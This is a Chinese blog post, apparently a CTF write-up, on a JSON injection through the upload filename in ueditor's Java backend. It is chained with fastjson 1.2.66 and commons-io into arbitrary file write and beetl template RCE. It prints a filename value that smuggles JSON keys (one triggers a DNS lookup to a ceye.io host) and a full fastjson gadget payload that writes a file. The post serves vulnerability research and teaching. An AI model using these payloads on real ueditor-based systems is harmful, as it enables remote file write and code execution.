<!DOCTYPE html>
<html lang="zh">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="renderer" content="webkit">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
    <meta name="google-site-verification" content="TZE0rZyIqLl10trYu3BWBWa1Vmz6HFwhb2OcNEK4u-s" />
     <link rel="shortcut icon" href= /img/favicon1.ico >
    <title>
        Squirt1e&#39;s blog
    </title>
    <meta name="description" content= 欢迎访问！ >
    <meta name="keywords" content= Blog,Squirt1e >
    
<link rel="stylesheet" href="/libs/highlight/styles/monokai-sublime.css">

    
<link rel="stylesheet" href="/libs/font-awesome/css/font-awesome.min.css">

    
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 6.3.0"><link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css">
<link rel="stylesheet" href="/css/prism-line-numbers.css" type="text/css"></head>
<body id="bodyx">
    <div class="hd posts">
    <a href="/index.html"><i class="fa fa-home
 replay-btn" aria-hidden="true"></i></a>
    <div class="post-title">
        <p>
            浅谈ueditor的json注入问题
        </p>
        <hr>
    </div>
    <div class="post-content">
        <blockquote>
<p>文章首发于先知社区，<a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/14462">传送门</a>。</p>
</blockquote>
<h3 id="TL-DR"><a href="#TL-DR" class="headerlink" title="TL;DR"></a>TL;DR</h3><p>前段时间给<code>venom</code>招新赛出了两道题，其中的<code>java</code>题源自去年审计<code>ueditor</code>源码时发现的一个小问题，感觉有希望产出一些漏洞，接着探索了一下发现确实有洞。因为利用过程太过<code>ctf</code>了，并且相对简单所以理所当然做成了一道<code>ctf</code>题目。</p>
<h3 id="ueditor的JSON注入隐患"><a href="#ueditor的JSON注入隐患" class="headerlink" title="ueditor的JSON注入隐患"></a>ueditor的JSON注入隐患</h3><h4 id="你好-ueditor"><a href="#你好-ueditor" class="headerlink" title="你好 ueditor"></a>你好 ueditor</h4><p><code>ueditor</code>在<code>2023</code>年在<code>github</code>上停止维护，实际上五年前就不在更新了。在<code>java</code>版本当中，官方给出了上传文件的标准用法，即调用<code>String json = new ActionEnter(request, rootPath).exec()</code>，正常来说后端直接返回<code>json</code>字符串即可。</p>
<p>但是，如果开发者想修改返回的属性（增删几个<code>key</code>）的话，还是会用<code>JSON</code>解析库解析<code>json</code>，如果在<code>json</code>字符串（部分）可控的情况下，此时可能会出现安全问题。<del>大概扫了一眼国内的<code>CMS</code>引入<code>ueditor</code>还挺多的，师父们可以看看有哪些<code>cms</code>调用了<code>ueditor</code>并且进行不安全编码规范导致漏洞触发，没准能刷点<code>0day</code>。</del></p>
<p>喜提忽略一枚：</p>
<p><img src="https://squirt1e.oss-cn-beijing.aliyuncs.com/blog/1708169914163.png" alt="1708169914163"></p>
<h4 id="隐患分析"><a href="#隐患分析" class="headerlink" title="隐患分析"></a>隐患分析</h4><p>潜在隐患，也就是<code>sink</code>在<code>com.baidu.ueditor.define.BaseState#toString</code>方法中，<code>new ActionEnter(request, rootPath).exec()</code>实际上调用的就是该方法。</p>
<p>其主要逻辑是对<code>map</code>进行遍历，把<code>key</code>和<code>value</code>进行处理最终制作成<code>JSON</code>字符串形式。<br>其中<code>key</code>和<code>value</code>用<code>+</code>进行拼接，如果<code>key</code>或<code>value</code>可控的话可能会导致<code>json</code>注入问题。</p>
<p><img src="https://squirt1e.oss-cn-beijing.aliyuncs.com/blog/1694866213804.jpg" alt="Alt text"></p>
<p>我们来找一下<code>key</code>或<code>value</code>是否可控，<code>ActionEnter#invoke</code>方法调用了<code>state#toJSONString</code>,可以看到当<code>ActionMap</code>为<code>UPLOAD_FILE</code>（文件上传）操作时会触发 <code>Uploader#doExec</code>。</p>
<p><img src="https://squirt1e.oss-cn-beijing.aliyuncs.com/blog/image-2.png" alt="Alt text"></p>
<p>接着看<code>Uploader#doExec</code>的逻辑，这里会根据是否<code>base64</code>调用不同类的<code>save</code>方法。当操作为<code>UPLOAD_FILE</code>时配置类<code>ConfigManager</code>的<code>isBase64</code>为<code>false</code>，所以<code>Uploader#doExec</code>触发<code>BinaryUploader#save</code>。</p>
<pre class="line-numbers language-java"><code class="language-java"><span class="token keyword">case</span> ActionMap<span class="token punctuation">.</span>UPLOAD_FILE<span class="token operator">:</span>
    conf<span class="token punctuation">.</span><span class="token function">put</span><span class="token punctuation">(</span><span class="token string">"isBase64"</span><span class="token punctuation">,</span> <span class="token string">"false"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    conf<span class="token punctuation">.</span><span class="token function">put</span><span class="token punctuation">(</span><span class="token string">"maxSize"</span><span class="token punctuation">,</span> <span class="token keyword">this</span><span class="token punctuation">.</span>jsonConfig<span class="token punctuation">.</span><span class="token function">getLong</span><span class="token punctuation">(</span><span class="token string">"fileMaxSize"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    conf<span class="token punctuation">.</span><span class="token function">put</span><span class="token punctuation">(</span><span class="token string">"allowFiles"</span><span class="token punctuation">,</span> <span class="token keyword">this</span><span class="token punctuation">.</span><span class="token function">getArray</span><span class="token punctuation">(</span><span class="token string">"fileAllowFiles"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    conf<span class="token punctuation">.</span><span class="token function">put</span><span class="token punctuation">(</span><span class="token string">"fieldName"</span><span class="token punctuation">,</span> <span class="token keyword">this</span><span class="token punctuation">.</span>jsonConfig<span class="token punctuation">.</span><span class="token function">getString</span><span class="token punctuation">(</span><span class="token string">"fileFieldName"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    savePath <span class="token operator">=</span> <span class="token keyword">this</span><span class="token punctuation">.</span>jsonConfig<span class="token punctuation">.</span><span class="token function">getString</span><span class="token punctuation">(</span><span class="token string">"filePathFormat"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token keyword">break</span><span class="token punctuation">;</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p><img src="https://squirt1e.oss-cn-beijing.aliyuncs.com/blog/image-3.png" alt="Alt text"></p>
<p>继续审计<code>BinaryUploader#save</code>函数，可以看到<code>originFileName</code>是由上传表单的<code>filename</code>控制的，找到了可控点。值得注意的是程序校验了后缀名，这很好绕过。令<code>filename</code>为<code>filename=flag&quot;,&quot;vulnerable&quot;:&quot;hacked&quot;,&quot;a&quot;:&quot;.txt</code>即可绕过检测。最终会把<code>originFileName</code>放进<code>BaseState</code>当中。</p>
<p><img src="https://squirt1e.oss-cn-beijing.aliyuncs.com/blog/image-4.png" alt="Alt text"></p>
<p>接着触发<code>toJSONString</code>通过拼接把恶意字符处理为字符串，也就是开头提到的<code>sink</code>。</p>
<p><img src="https://squirt1e.oss-cn-beijing.aliyuncs.com/blog/1694868670291.png" alt="Alt text"></p>
<p>发现以上函数调用可以通过<code>/ueditor</code>路由触发，其中返回的<code>json</code>为恶意字符串，最终把<code>json</code>传给了<code>uploadService#uploadHandle</code>。因此我们可以看看<code>uplodaHandle</code>方法干了啥，使得一个<code>JSON</code>注入隐患最终造成远程命令执行。</p>
<p><img src="https://squirt1e.oss-cn-beijing.aliyuncs.com/blog/image-20240217194225885.png" alt="image-20240217194225885"></p>
<h4 id="漏洞触发思考"><a href="#漏洞触发思考" class="headerlink" title="漏洞触发思考"></a>漏洞触发思考</h4><p>到目前为止仅仅是存在一个隐患，如果开发者没有解析<code>JSON</code>字符串那么不会造成真正的危害，当时想应该有两个利用面。</p>
<ol>
<li>直接使用<code>fastjson#parse</code>解析该字符串，倘若<code>fj</code>的版本较低，那么可以<code>RCE</code>。</li>
<li>需要观察开发解析字符串后的逻辑，比如开发自己实现了备份文件的功能，而备份文件的路径取自<code>filepath</code>之类的，此时利用<code>JSON</code>注入注进去一个同名属性<code>filepath</code>，可能会覆盖点原有的<code>filepath</code>从而造成任意文件上传。</li>
</ol>
<h3 id="利用"><a href="#利用" class="headerlink" title="利用"></a>利用</h3><p>当时确实找到了几个洞，其中<code>star</code>最多的<code>cms</code>被我修修改改做成了这道题，实际上就是低版本<code>fastjson</code>解析的问题啦。接下来就复制粘贴<code>wp</code>了。</p>
<p>题目只有登录，文件上传功能。</p>
<p>其中<code>IndexController</code>处理登录逻辑，不存在注入问题。</p>
<p><code>UploadController</code>要求登陆用户为<code>admin</code>才能上传，弱口令<code>admin/admin</code>即可登录。</p>
<pre class="line-numbers language-java"><code class="language-java"><span class="token keyword">public</span> String <span class="token function">upload</span><span class="token punctuation">(</span>HttpServletRequest request<span class="token punctuation">,</span> Model model<span class="token punctuation">,</span> HttpSession session<span class="token punctuation">,</span> <span class="token annotation punctuation">@RequestParam</span><span class="token punctuation">(</span>value <span class="token operator">=</span> <span class="token string">"action"</span><span class="token punctuation">,</span>required <span class="token operator">=</span> <span class="token boolean">false</span><span class="token punctuation">)</span> String action<span class="token punctuation">)</span> <span class="token keyword">throws</span> URISyntaxException <span class="token punctuation">{</span>
    String user<span class="token operator">=</span><span class="token punctuation">(</span>String<span class="token punctuation">)</span> session<span class="token punctuation">.</span><span class="token function">getAttribute</span><span class="token punctuation">(</span><span class="token string">"user"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token keyword">if</span><span class="token punctuation">(</span><span class="token operator">!</span><span class="token string">"admin"</span><span class="token punctuation">.</span><span class="token function">equals</span><span class="token punctuation">(</span>user<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">{</span>
        model<span class="token punctuation">.</span><span class="token function">addAttribute</span><span class="token punctuation">(</span><span class="token string">"message"</span><span class="token punctuation">,</span><span class="token string">"no way"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token keyword">return</span> <span class="token string">"upload"</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span>
    <span class="token keyword">if</span><span class="token punctuation">(</span>action <span class="token operator">==</span> null<span class="token punctuation">)</span><span class="token punctuation">{</span>
        model<span class="token punctuation">.</span><span class="token function">addAttribute</span><span class="token punctuation">(</span><span class="token string">"message"</span><span class="token punctuation">,</span><span class="token string">"传个文件吧"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token keyword">return</span> <span class="token string">"upload"</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span>
    String json <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">ActionEnter</span><span class="token punctuation">(</span>request<span class="token punctuation">,</span> UploadController<span class="token punctuation">.</span><span class="token keyword">class</span><span class="token punctuation">.</span><span class="token function">getResource</span><span class="token punctuation">(</span><span class="token string">"/"</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">toURI</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">getPath</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token operator">+</span>rootPath<span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">exec</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    String contextPath <span class="token operator">=</span> request<span class="token punctuation">.</span><span class="token function">getContextPath</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token comment" spellcheck="true">// 文件处理</span>
    String handlerOut <span class="token operator">=</span> uploadService<span class="token punctuation">.</span><span class="token function">uploadHandle</span><span class="token punctuation">(</span>action<span class="token punctuation">,</span> json<span class="token punctuation">,</span> contextPath<span class="token punctuation">)</span><span class="token punctuation">;</span>
    model<span class="token punctuation">.</span><span class="token function">addAttribute</span><span class="token punctuation">(</span><span class="token string">"message"</span><span class="token punctuation">,</span>handlerOut<span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token keyword">return</span> <span class="token string">"upload"</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>真正处理文件上传逻辑在<code>new ActionEnter(request, UploadController.class.getResource(&quot;/&quot;).toURI().getPath()+rootPath).exec();</code>，即调用了<code>ueditor</code>提供的函数来实现文件上传，而<code>UploadServiceImpl#uploadFileHandler</code>方法仅仅是多加了一个返回字段。</p>
<p>我猜有些师傅看到文件上传就会想到上传<code>btl</code>来覆盖<code>test.btl</code>等模板来打模板注入<code>RCE</code>，但<code>ueditor</code>的文件上传逻辑限制的比较死。一方面是通过<code>config.json</code>来限制了文件后缀，不能上传<code>btl</code>；另一方面也没法目录穿越。</p>
<p>所以很快就能发现<code>UploadServiceImpl#uploadFileHandler</code>方法十分可疑。这里通过<code>parseObject</code>处理<code>outJsonString</code>字符串，再看一眼<code>fj</code>的依赖不是最新的，当时也是给出了提示，很明显<code>sink</code>就在这里。</p>
<pre class="line-numbers language-java"><code class="language-java"><span class="token keyword">protected</span> String <span class="token function">uploadFileHandler</span><span class="token punctuation">(</span>String outJsonString<span class="token punctuation">,</span> String contextPath<span class="token punctuation">)</span> <span class="token punctuation">{</span>
    State state <span class="token operator">=</span> null<span class="token punctuation">;</span>

    JSONObject json <span class="token operator">=</span> JSON<span class="token punctuation">.</span><span class="token function">parseObject</span><span class="token punctuation">(</span>outJsonString<span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token operator">!</span><span class="token string">"SUCCESS"</span><span class="token punctuation">.</span><span class="token function">equals</span><span class="token punctuation">(</span>json<span class="token punctuation">.</span><span class="token function">getString</span><span class="token punctuation">(</span><span class="token string">"state"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
        <span class="token keyword">return</span> <span class="token string">"error"</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span>
    json<span class="token punctuation">.</span><span class="token function">put</span><span class="token punctuation">(</span><span class="token string">"author"</span><span class="token punctuation">,</span><span class="token string">"squirt1e"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

    <span class="token keyword">return</span> state <span class="token operator">==</span> null <span class="token operator">?</span> outJsonString <span class="token operator">:</span> state<span class="token punctuation">.</span><span class="token function">toJSONString</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>如果<code>outJsonString</code>可控就可以利用了，而<code>outJsonString</code>是<code>ueditor</code>的方法返回的字符串，需要审计<code>ueditor</code>源码，就是上面那一部分。</p>
<h4 id="fastjson-common-io任意文件写"><a href="#fastjson-common-io任意文件写" class="headerlink" title="fastjson common-io任意文件写"></a>fastjson common-io任意文件写</h4><p><code>uploadHandle</code>通过<code>parseObject</code>方法对恶意字符串进行解析，可以看到<code>json</code>已经被污染了。</p>
<p><img src="https://squirt1e.oss-cn-beijing.aliyuncs.com/blog/image-5.png" alt="Alt text"></p>
<p>本题用到的<code>fastjson</code>为<code>1.2.66</code>，版本不高存在利用的可能。观察<code>pom.xml</code>发现存在<code>commons-io 2.7</code>（多提一嘴<code>ueditor.jar</code>本身引入了<code>common-io</code>）。不难想到<code>fastjson1.2.68</code>结合<code>common-io2.x</code>可以打一个任意文件写入，构造原理可以参考<code>su18</code>发的博客。值得注意的一点是<code>json</code>的第一个属性<code>&quot;state&quot;:&quot;SUCCESS</code>“是不可控的，令<code>filename</code>为<code>flag&quot;,&#123;&quot;@type&quot;:&quot;java.net.Inet4Address&quot;,&quot;val&quot;:&quot;bgb5eh.ceye.io&quot;&#125;,&quot;a&quot;:&quot;.txt</code>即可正常恢复<code>Java Bean</code>。</p>
<pre class="line-numbers language-json"><code class="language-json"><span class="token punctuation">{</span>
  <span class="token property">"@type"</span><span class="token operator">:</span><span class="token string">"java.lang.AutoCloseable"</span><span class="token punctuation">,</span>
  <span class="token property">"@type"</span><span class="token operator">:</span><span class="token string">"org.apache.commons.io.input.XmlStreamReader"</span><span class="token punctuation">,</span>
  <span class="token property">"is"</span><span class="token operator">:</span><span class="token punctuation">{</span>
    <span class="token property">"@type"</span><span class="token operator">:</span><span class="token string">"org.apache.commons.io.input.TeeInputStream"</span><span class="token punctuation">,</span>
    <span class="token property">"input"</span><span class="token operator">:</span><span class="token punctuation">{</span>
      <span class="token property">"@type"</span><span class="token operator">:</span><span class="token string">"org.apache.commons.io.input.ReaderInputStream"</span><span class="token punctuation">,</span>
      <span class="token property">"reader"</span><span class="token operator">:</span><span class="token punctuation">{</span>
        <span class="token property">"@type"</span><span class="token operator">:</span><span class="token string">"org.apache.commons.io.input.CharSequenceReader"</span><span class="token punctuation">,</span>
        <span class="token property">"charSequence"</span><span class="token operator">:</span><span class="token punctuation">{</span><span class="token property">"@type"</span><span class="token operator">:</span><span class="token string">"java.lang.String"</span><span class="token string">"aaaaaa"</span>
      <span class="token punctuation">}</span><span class="token punctuation">,</span>
      <span class="token property">"charsetName"</span><span class="token operator">:</span><span class="token string">"UTF-8"</span><span class="token punctuation">,</span>
      <span class="token property">"bufferSize"</span><span class="token operator">:</span><span class="token number">1024</span>
    <span class="token punctuation">}</span><span class="token punctuation">,</span>
    <span class="token property">"branch"</span><span class="token operator">:</span><span class="token punctuation">{</span>
      <span class="token property">"@type"</span><span class="token operator">:</span><span class="token string">"org.apache.commons.io.output.WriterOutputStream"</span><span class="token punctuation">,</span>
      <span class="token property">"writer"</span><span class="token operator">:</span> <span class="token punctuation">{</span>
        <span class="token property">"@type"</span><span class="token operator">:</span><span class="token string">"org.apache.commons.io.output.FileWriterWithEncoding"</span><span class="token punctuation">,</span>
        <span class="token property">"file"</span><span class="token operator">:</span> <span class="token string">"/tmp/pwned"</span><span class="token punctuation">,</span>
        <span class="token property">"encoding"</span><span class="token operator">:</span> <span class="token string">"UTF-8"</span><span class="token punctuation">,</span>
        <span class="token property">"append"</span><span class="token operator">:</span> <span class="token boolean">false</span>
      <span class="token punctuation">}</span><span class="token punctuation">,</span>
      <span class="token property">"charset"</span><span class="token operator">:</span> <span class="token string">"UTF-8"</span><span class="token punctuation">,</span>
      <span class="token property">"bufferSize"</span><span class="token operator">:</span> <span class="token number">1024</span><span class="token punctuation">,</span>
      <span class="token property">"writeImmediately"</span><span class="token operator">:</span> <span class="token boolean">true</span>
    <span class="token punctuation">}</span><span class="token punctuation">,</span>
    <span class="token property">"closeBranch"</span><span class="token operator">:</span><span class="token boolean">true</span>
  <span class="token punctuation">}</span><span class="token punctuation">,</span>
  <span class="token property">"httpContentType"</span><span class="token operator">:</span><span class="token string">"text/xml"</span><span class="token punctuation">,</span>
  <span class="token property">"lenient"</span><span class="token operator">:</span><span class="token boolean">false</span><span class="token punctuation">,</span>
  <span class="token property">"defaultEncoding"</span><span class="token operator">:</span><span class="token string">"UTF-8"</span>
<span class="token punctuation">}</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>除了属性开头的坑之外还有好多坑，实际上<code>ueditor Json injection</code>那里大概看了没多久就审出来了，但是利用卡了我一天。。</p>
<p>第一点是<code>fj</code>调用构造函数存在随机性，而<code>WriterOutputStream</code>恰好有一堆很相似的构造函数，所以在构造的时候需要注意<code>WriterOutputStream</code>构造方法的第二个属性是<code>charset</code>或<code>charsetName</code>，如果属性名称错误会报<code>Exception in thread &quot;main&quot; com.alibaba.fastjson.JSONException: create instance error, null, public</code>。</p>
<pre class="line-numbers language-java"><code class="language-java"><span class="token keyword">public</span> <span class="token function">WriterOutputStream</span><span class="token punctuation">(</span>Writer writer<span class="token punctuation">,</span> Charset charset<span class="token punctuation">,</span> <span class="token keyword">int</span> bufferSize<span class="token punctuation">,</span> <span class="token keyword">boolean</span> writeImmediately<span class="token punctuation">)</span> <span class="token punctuation">{</span>
    <span class="token keyword">this</span><span class="token punctuation">(</span>writer<span class="token punctuation">,</span> charset<span class="token punctuation">.</span><span class="token function">newDecoder</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">onMalformedInput</span><span class="token punctuation">(</span>CodingErrorAction<span class="token punctuation">.</span>REPLACE<span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">onUnmappableCharacter</span><span class="token punctuation">(</span>CodingErrorAction<span class="token punctuation">.</span>REPLACE<span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">replaceWith</span><span class="token punctuation">(</span><span class="token string">"?"</span><span class="token punctuation">)</span><span class="token punctuation">,</span> bufferSize<span class="token punctuation">,</span> writeImmediately<span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>

<span class="token keyword">public</span> <span class="token function">WriterOutputStream</span><span class="token punctuation">(</span>Writer writer<span class="token punctuation">,</span> String charsetName<span class="token punctuation">,</span> <span class="token keyword">int</span> bufferSize<span class="token punctuation">,</span> <span class="token keyword">boolean</span> writeImmediately<span class="token punctuation">)</span> <span class="token punctuation">{</span>
    <span class="token keyword">this</span><span class="token punctuation">(</span>writer<span class="token punctuation">,</span> Charset<span class="token punctuation">.</span><span class="token function">forName</span><span class="token punctuation">(</span>charsetName<span class="token punctuation">)</span><span class="token punctuation">,</span> bufferSize<span class="token punctuation">,</span> writeImmediately<span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>第二点是该方法（应该）仅支持绝对路径文件写入，<code>MiscCodec</code>中限制了相对路径写入。不过题目应该会给<code>docker</code>所以选手到时候看<code>docker</code>里的模板路径就可以了。如果难度不够的话绝对路径这部分可以当个考点。</p>
<pre class="line-numbers language-java"><code class="language-java"><span class="token keyword">else</span> <span class="token keyword">if</span> <span class="token punctuation">(</span>clazz <span class="token operator">!=</span> InetAddress<span class="token punctuation">.</span><span class="token keyword">class</span> <span class="token operator">&amp;&amp;</span> clazz <span class="token operator">!=</span> Inet4Address<span class="token punctuation">.</span><span class="token keyword">class</span> <span class="token operator">&amp;&amp;</span> clazz <span class="token operator">!=</span> Inet6Address<span class="token punctuation">.</span><span class="token keyword">class</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
    <span class="token keyword">if</span> <span class="token punctuation">(</span>clazz <span class="token operator">==</span> File<span class="token punctuation">.</span><span class="token keyword">class</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
        <span class="token keyword">if</span> <span class="token punctuation">(</span>strVal<span class="token punctuation">.</span><span class="token function">indexOf</span><span class="token punctuation">(</span><span class="token string">".."</span><span class="token punctuation">)</span> <span class="token operator">>=</span> <span class="token number">0</span> <span class="token operator">&amp;&amp;</span> <span class="token operator">!</span>FILE_RELATIVE_PATH_SUPPORT<span class="token punctuation">)</span> <span class="token punctuation">{</span>
            <span class="token keyword">throw</span> <span class="token keyword">new</span> <span class="token class-name">JSONException</span><span class="token punctuation">(</span><span class="token string">"file relative path not support."</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span> <span class="token keyword">else</span> <span class="token punctuation">{</span>
        <span class="token keyword">return</span> <span class="token keyword">new</span> <span class="token class-name">File</span><span class="token punctuation">(</span>strVal<span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>第三点是写不进去双引号<code>&quot;</code>，分号<code>;</code>之类的字符。这部分不是任意文件写这条<code>gadget</code>的问题，而是因为<code>ueditor</code>这里的<code>JSON</code>注入是个<code>http</code>请求头中的<code>filename</code>注入，所以写一些奇怪字符会导致<code>http</code>请求出现一些问题。结合<code>beetl</code>语法用<code>parameter.a</code>就能绕过了。后续在访问恶意模板时加个参数<code>?a</code>即可。</p>
<h4 id="beetl模板RCE"><a href="#beetl模板RCE" class="headerlink" title="beetl模板RCE"></a>beetl模板RCE</h4><p>这部分和本文主旨无关啦。</p>
<p><code>beetle</code>国产模板实际上很好<code>RCE</code>(话说经过<code>RWCTF thymeleaf</code>那道题的洗礼后看啥模板都有自信了)，模板支持<code>java</code>方法以及属性调用。并且防护类<code>DefaultNativeSecurityManager</code>就一个黑名单，翻翻<code>issue</code>就能找到<code>payload</code>，即便修了还是会有一大堆。</p>
<p>所以我参考<code>patch</code>写了一个看似无懈可击的白名单类。</p>
<p>只允许调用<code>venom.elephantcms</code>的方法，选手只能调用我自己写的方法，而往下翻翻就找到了这个类居然有个<code>test</code>方法可以重新定义<code>callPattern</code>白名单，<code>callPattern</code>我故意没写<code>final</code>修饰。</p>
<pre class="line-numbers language-java"><code class="language-java"><span class="token keyword">public</span> <span class="token keyword">class</span> <span class="token class-name">WhiteListNativeSecurityManager</span> <span class="token keyword">implements</span> <span class="token class-name">NativeSecurityManager</span> <span class="token punctuation">{</span>
    <span class="token keyword">public</span> <span class="token keyword">static</span> Pattern callPattern <span class="token operator">=</span> null<span class="token punctuation">;</span>
    <span class="token keyword">public</span> <span class="token function">WhiteListNativeSecurityManager</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">{</span>
        <span class="token function">allow</span><span class="token punctuation">(</span>Arrays<span class="token punctuation">.</span><span class="token function">asList</span><span class="token punctuation">(</span><span class="token string">"venom.elephantcms"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span>

    <span class="token annotation punctuation">@Override</span>
    <span class="token keyword">public</span> <span class="token keyword">boolean</span> <span class="token function">permit</span><span class="token punctuation">(</span>Object resourceId<span class="token punctuation">,</span> Class <span class="token class-name">c</span><span class="token punctuation">,</span> Object target<span class="token punctuation">,</span> String method<span class="token punctuation">)</span> <span class="token punctuation">{</span>
        <span class="token keyword">if</span> <span class="token punctuation">(</span>c<span class="token punctuation">.</span><span class="token function">isArray</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
<span class="token comment" spellcheck="true">//            WhiteListNativeSecurityManager.class.getClassLoader()</span>
            <span class="token comment" spellcheck="true">// 允许调用，但实际上会在在其后调用中报错。不归此处管理</span>
            <span class="token keyword">return</span> <span class="token boolean">true</span><span class="token punctuation">;</span>
        <span class="token punctuation">}</span>
<span class="token comment" spellcheck="true">//        Runtime.getRuntime()</span>
        String name <span class="token operator">=</span> c<span class="token punctuation">.</span><span class="token function">getName</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        String className <span class="token operator">=</span> null<span class="token punctuation">;</span>
        String pkgName <span class="token operator">=</span> null<span class="token punctuation">;</span>
        <span class="token keyword">int</span> i <span class="token operator">=</span> name<span class="token punctuation">.</span><span class="token function">lastIndexOf</span><span class="token punctuation">(</span><span class="token string">'.'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token keyword">if</span> <span class="token punctuation">(</span>i <span class="token operator">==</span> <span class="token operator">-</span><span class="token number">1</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
            <span class="token comment" spellcheck="true">// 无包名，肯定安全，允许调用</span>
            <span class="token keyword">return</span> <span class="token boolean">true</span><span class="token punctuation">;</span>

        <span class="token punctuation">}</span>

        <span class="token keyword">return</span>  callPattern<span class="token punctuation">.</span><span class="token function">matcher</span><span class="token punctuation">(</span>name<span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">matches</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

    <span class="token punctuation">}</span>
    <span class="token keyword">public</span> <span class="token keyword">static</span> String <span class="token function">test</span><span class="token punctuation">(</span>String test<span class="token punctuation">)</span><span class="token punctuation">{</span>
        <span class="token function">allow</span><span class="token punctuation">(</span>Arrays<span class="token punctuation">.</span><span class="token function">asList</span><span class="token punctuation">(</span>test<span class="token punctuation">.</span><span class="token function">split</span><span class="token punctuation">(</span><span class="token string">","</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token keyword">return</span> <span class="token string">"ok"</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span>

    <span class="token comment" spellcheck="true">/**
     *  指定白名单，默认是java.util
     * @param calls ,调用，如 [java.util,java.io.File]
     */</span>
    <span class="token keyword">public</span> <span class="token keyword">static</span> <span class="token keyword">void</span> <span class="token function">allow</span><span class="token punctuation">(</span>List<span class="token operator">&lt;</span>String<span class="token operator">></span> calls<span class="token punctuation">)</span><span class="token punctuation">{</span>
        StringBuilder sb <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">StringBuilder</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token keyword">for</span><span class="token punctuation">(</span>String pkg<span class="token operator">:</span>calls<span class="token punctuation">)</span><span class="token punctuation">{</span>
            <span class="token keyword">int</span> c <span class="token operator">=</span> pkg<span class="token punctuation">.</span><span class="token function">lastIndexOf</span><span class="token punctuation">(</span><span class="token string">'.'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
            <span class="token keyword">boolean</span> classCall <span class="token operator">=</span> <span class="token boolean">false</span><span class="token punctuation">;</span>
